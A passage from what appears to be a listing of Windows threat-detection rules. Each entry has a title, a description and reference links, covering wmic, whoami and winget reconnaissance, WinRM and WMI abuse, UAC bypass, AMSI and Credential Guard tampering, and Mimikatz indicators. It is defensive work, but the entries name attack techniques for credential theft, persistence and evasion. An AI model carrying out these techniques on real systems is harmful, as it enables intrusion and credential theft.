https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/ |
Suspicious File Download From IP Via Wget.EXE - Paths |
Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe |
https://www.gnu.org/software/wget/manual/wget.html |
Suspicious Where Execution |
Adversaries may enumerate browser bookmarks to learn more about compromised hosts.
Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about
internal network resources such as servers, tools/dashboards, or other related infrastructure.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md |
Enumerate All Information With Whoami.EXE |
Detects the execution of "whoami.exe" with the "/all" flag |
https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/, https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s |
Whoami Utility Execution |
Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation |
https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ |
Whoami.EXE Execution From Privileged Process |
Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/ |
Group Membership Reconnaissance Via Whoami.EXE |
Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami |
Whoami.EXE Execution With Output Option |
Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use. |
https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/, https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s |
Whoami.EXE Execution Anomaly |
Detects the execution of whoami.exe with suspicious parent processes. |
https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/, https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s |
Security Privileges Enumeration Via Whoami.EXE |
Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami |
Suspicious WindowsTerminal Child Processes |
Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section) |
https://persistence-info.github.io/Data/windowsterminalprofile.html, https://twitter.com/nas_bench/status/1550836225652686848 |
Add New Download Source To Winget |
Detects usage of winget to add new additional download sources |
https://learn.microsoft.com/en-us/windows/package-manager/winget/source, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget |
Add Insecure Download Source To Winget |
Detects usage of winget to add a new insecure (http) download source.
Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
|
https://learn.microsoft.com/en-us/windows/package-manager/winget/source, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget |
Add Potential Suspicious New Download Source To Winget |
Detects usage of winget to add new potentially suspicious download sources |
https://learn.microsoft.com/en-us/windows/package-manager/winget/source, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget |
Install New Package Via Winget Local Manifest |
Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.
The manifest option enables you to install an application by passing in a YAML file directly to the client.
Winget can be used to download and install exe, msi or msix files later.
|
https://learn.microsoft.com/en-us/windows/package-manager/winget/install#local-install, https://lolbas-project.github.io/lolbas/Binaries/Winget/, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget |
Winrar Compressing Dump Files |
Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. |
https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ |
Potentially Suspicious Child Process Of WinRAR.EXE |
Detects potentially suspicious child processes of WinRAR.exe. |
https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/, https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md |
Winrar Execution in Non-Standard Folder |
Detects a suspicious winrar execution in a folder which is not the default installation folder |
https://twitter.com/cyb3rops/status/1460978167628406785 |
AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl |
Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) |
https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 |
Remote Code Execute via Winrm.vbs |
Detects an attempt to execute code or create service on remote host via winrm.vbs. |
https://twitter.com/bohops/status/994405551751815170, https://redcanary.com/blog/lateral-movement-winrm-wmi/, https://lolbas-project.github.io/lolbas/Scripts/Winrm/ |
Remote PowerShell Session Host Process (WinRM) |
Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session). |
https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html |
Suspicious Processes Spawned by WinRM |
Detects suspicious processes including shells spawnd from WinRM host process |
Internal Research |
Compress Data and Lock With Password for Exfiltration With WINZIP |
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md |
Wlrmdr.EXE Uncommon Argument Or Child Process |
Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries.
This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry.
|
https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ, https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/ |
New ActiveScriptEventConsumer Created Via Wmic.EXE |
Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence |
https://twitter.com/johnlatwc/status/1408062131321270282?s=12, https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf |
Potential Windows Defender Tampering Via Wmic.EXE |
Detects potential tampering with Windows Defender settings such as adding exclusion using wmic |
https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md, https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/, https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/ |
New Process Created Via Wmic.EXE |
Detects new process creation using WMIC via the "process call create" flag |
https://www.sans.org/blog/wmic-for-incident-response/, https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process |
Computer System Reconnaissance Via Wmic.EXE |
Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc. |
https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ |
Local Groups Reconnaissance Via Wmic.EXE |
Detects the execution of "wmic" with the "group" flag.
Adversaries may attempt to find local system groups and permission settings.
The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md |
Hardware Model Reconnaissance Via Wmic.EXE |
Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information |
https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/, https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks |
Windows Hotfix Updates Reconnaissance Via Wmic.EXE |
Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts |
https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat, https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html |
Process Reconnaissance Via Wmic.EXE |
Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic |
Potential Product Reconnaissance Via Wmic.EXE |
Detects the execution of WMIC in order to get a list of firewall and antivirus products |
https://thedfirreport.com/2023/03/06/2022-year-in-review/, https://www.yeahhub.com/list-installed-programs-version-path-windows/, https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product |
Potential Product Class Reconnaissance Via Wmic.EXE |
Detects the execution of WMIC in order to get a list of firewall and antivirus products |
https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md, https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1 |
Service Reconnaissance Via Wmic.EXE |
An adversary might use WMI to check if a certain remote service is running on a remote device.
When the test completes, a service information will be displayed on the screen if it exists.
A common feedback message is that "No instance(s) Available" if the service queried is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic |
Uncommon System Information Discovery Via Wmic.EXE |
Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,
and GPU driver products/versions.
Some of these commands were used by Aurora Stealer in late 2022/early 2023.
|
https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic, https://nwgat.ninja/getting-system-information-with-wmic-on-windows/, https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar, https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/, https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/, https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior |
Potential Unquoted Service Path Reconnaissance Via Wmic.EXE |
Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts |
https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py, https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
System Disk And Volume Reconnaissance Via Wmic.EXE |
An adversary might use WMI to discover information about the system, such as the volume name, size,
free space, and other disk information. This can be done using the `wmic` command-line utility and has been
observed being used by threat actors such as Volt Typhoon.
|
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic |
WMIC Remote Command Execution |
Detects the execution of WMIC to query information on a remote system |
https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic |
Service Started/Stopped Via Wmic.EXE |
Detects usage of wmic to start or stop a service |
https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html |
Potential SquiblyTwo Technique Execution |
Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields |
https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html, https://twitter.com/mattifestation/status/986280382042595328, https://atomicredteam.io/defense-evasion/T1220/, https://lolbas-project.github.io/lolbas/Binaries/Wmic/ |
Suspicious WMIC Execution Via Office Process |
Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin). |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml |
Suspicious Process Created Via Wmic.EXE |
Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc. |
https://thedfirreport.com/2020/10/08/ryuks-return/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker |
Application Terminated Via Wmic.EXE |
Detects calls to the "terminate" function via wmic in order to kill an application |
https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/, https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf |
Application Removed Via Wmic.EXE |
Detects the removal or uninstallation of an application via "Wmic.EXE". |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic |
Potential Tampering With Security Products Via WMIC |
Detects uninstallation or termination of security products using the WMIC utility |
https://twitter.com/cglyer/status/1355171195654709249, https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/, https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html |
XSL Script Execution Via WMIC.EXE |
Detects the execution of WMIC with the "format" flag to potentially load XSL files.
Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md |
WmiPrvSE Spawned A Process |
Detects WmiPrvSE spawning a process |
https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html |
Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell |
Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI. |
https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e |
Suspicious WmiPrvSE Child Process |
Detects suspicious and uncommon child processes of WmiPrvSE |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml, https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/, https://twitter.com/ForensicITGuy/status/1334734244120309760 |
WMI Backdoor Exchange Transport Agent |
Detects a WMI backdoor in Exchange Transport Agents via WMI event filters |
https://twitter.com/cglyer/status/1182389676876980224, https://twitter.com/cglyer/status/1182391019633029120 |
WMI Persistence - Script Event Consumer |
Detects WMI script event consumers |
https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ |
UEFI Persistence Via Wpbbin - ProcessCreation |
Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section |
https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c, https://persistence-info.github.io/Data/wpbbin.html |
Potential Dropper Script Execution Via WScript/CScript |
Detects wscript/cscript executions of scripts located in user directories |
https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://redcanary.com/blog/gootloader/ |
Cscript/Wscript Potentially Suspicious Child Process |
Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.
Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.
|
Internal Research, https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_30.10.2023.txt, https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_22.12.2023.txt |
Cscript/Wscript Uncommon Script Extension Execution |
Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension |
Internal Research |
WSL Child Process Anomaly |
Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/, https://twitter.com/nas_bench/status/1535431474429808642 |
Windows Binary Executed From WSL |
Detects the execution of Windows binaries from within a WSL instance.
This could be used to masquerade parent-child relationships
|
Internal Research |
Proxy Execution Via Wuauclt.EXE |
Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution. |
https://dtm.uk/wuauclt/, https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/ |
Suspicious Windows Update Agent Empty Cmdline |
Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
|
https://redcanary.com/blog/blackbyte-ransomware/ |
Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths |
Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.
|
https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html, https://www.echotrail.io/insights/search/wusa.exe/ |
Wusa.EXE Executed By Parent Process Located In Suspicious Location |
Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.
Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges.
|
https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document |
Xwizard.EXE Execution From Non-Default Location |
Detects the execution of Xwizard tool from a non-default directory.
When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll".
|
https://lolbas-project.github.io/lolbas/Binaries/Xwizard/, http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ |
COM Object Execution via Xwizard.EXE |
Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument.
This utility can be abused in order to run custom COM object created in the registry.
|
https://lolbas-project.github.io/lolbas/Binaries/Xwizard/, https://www.elastic.co/guide/en/security/current/execution-of-com-object-via-xwizard.html, https://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ |
Potential Process Hollowing Activity |
Detects when a memory process image does not match the disk image, indicative of process hollowing. |
https://twitter.com/SecurePeacock/status/1486054048390332423?s=20, https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/ |
Potential Defense Evasion Via Raw Disk Access By Uncommon Tools |
Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Potential NetWire RAT Activity - Registry |
Detects registry keys related to NetWire RAT |
https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing, https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/, https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/, https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line, https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/ |
Potential Persistence Via New AMSI Providers - Registry |
Detects when an attacker registers a new AMSI provider in order to achieve persistence |
https://persistence-info.github.io/Data/amsi.html, https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c |
Potential COM Object Hijacking Via TreatAs Subkey - Registry |
Detects COM object hijacking via TreatAs subkey |
https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ |
Potential Persistence Via Disk Cleanup Handler - Registry |
Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.
The disk cleanup manager is part of the operating system. It displays the dialog box […]
The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
|
https://persistence-info.github.io/Data/diskcleanuphandler.html, https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ |
Potential Persistence Via Logon Scripts - Registry |
Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md |
PUA - Sysinternal Tool Execution - Registry |
Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key |
https://twitter.com/Moti_B/status/1008587936735035392 |
Suspicious Execution Of Renamed Sysinternals Tools - Registry |
Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool) |
Internal Research |
PUA - Sysinternals Tools Execution - Registry |
Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key. |
https://twitter.com/Moti_B/status/1008587936735035392 |
Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted |
Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value.
Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
|
https://learn.microsoft.com/en-us/windows/client-management/manage-recall, https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis |
Folder Removed From Exploit Guard ProtectedFolders List - Registry |
Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder |
https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/ |
Terminal Server Client Connection History Cleared - Registry |
Detects the deletion of registry keys containing the MSTSC connection history |
https://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer, http://woshub.com/how-to-clear-rdp-connections-history/, https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html |
Removal Of AMSI Provider Registry Keys |
Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://seclists.org/fulldisclosure/2020/Mar/45 |
Removal of Potential COM Hijacking Registry Keys |
Detects any deletion of entries in ".*\shell\open\command" registry keys.
These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
|
https://github.com/OTRF/detection-hackathon-apt29/issues/7, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md, https://learn.microsoft.com/en-us/windows/win32/shell/launch, https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand, https://learn.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code |
Removal Of Index Value to Hide Schedule Task - Registry |
Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query" |
https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments |
Removal Of SD Value to Hide Schedule Task - Registry |
Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware |
https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/ |
Creation of a Local Hidden User Account by Registry |
Sysmon registry detection of a local hidden user account. |
https://twitter.com/SBousseaden/status/1387530414185664538 |
Pandemic Registry Key |
Detects Pandemic Windows Implant |
https://wikileaks.org/vault7/#Pandemic, https://twitter.com/MalwareJake/status/870349480356454401 |
UAC Bypass Via Wsreset |
Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry. |
https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly, https://lolbas-project.github.io/lolbas/Binaries/Wsreset |
CMSTP Execution Registry Event |
Detects various indicators of Microsoft Connection Manager Profile Installer execution |
https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
Disable Security Events Logging Adding Reg Key MiniNt |
Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events. |
https://twitter.com/0gtweet/status/1182516740955226112 |
Esentutl Volume Shadow Copy Service Keys |
Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy |
Wdigest CredGuard Registry Modification |
Detects potential malicious modification of the property value of IsCredGuardEnabled from
HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system.
This is usually used with UseLogonCredential to manipulate the caching credentials.
|
https://teamhydra.blog/2020/08/25/bypassing-credential-guard/ |
Windows Credential Editor Registry |
Detects the use of Windows Credential Editor (WCE) |
https://www.ampliasecurity.com/research/windows-credentials-editor/ |
HybridConnectionManager Service Installation - Registry |
Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function. |
https://twitter.com/Cyb3rWard0g/status/1381642789369286662 |
Registry Entries For Azorult Malware |
Detects the presence of a registry key created during Azorult execution |
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a |
Potential Qakbot Registry Activity |
Detects a registry key used by IceID in a campaign that distributes malicious OneNote files |
https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution |
PrinterNightmare Mimikatz Driver Name |
Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527 |
https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760, https://www.lexjansen.com/sesug/1993/SESUG93035.pdf, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913, https://nvd.nist.gov/vuln/detail/cve-2021-1675, https://nvd.nist.gov/vuln/detail/cve-2021-34527 |
Path To Screensaver Binary Modified |
Detects value modification of registry key containing path to binary used as screensaver. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md, https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf |
Narrator's Feedback-Hub Persistence |
Detects abusing Windows 10 Narrator's Feedback-Hub |
https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html |
New DLL Added to AppCertDlls Registry Key |
Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation
by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
|
http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/, https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html |
NetNTLM Downgrade Attack - Registry |
Detects NetNTLM downgrade attack |
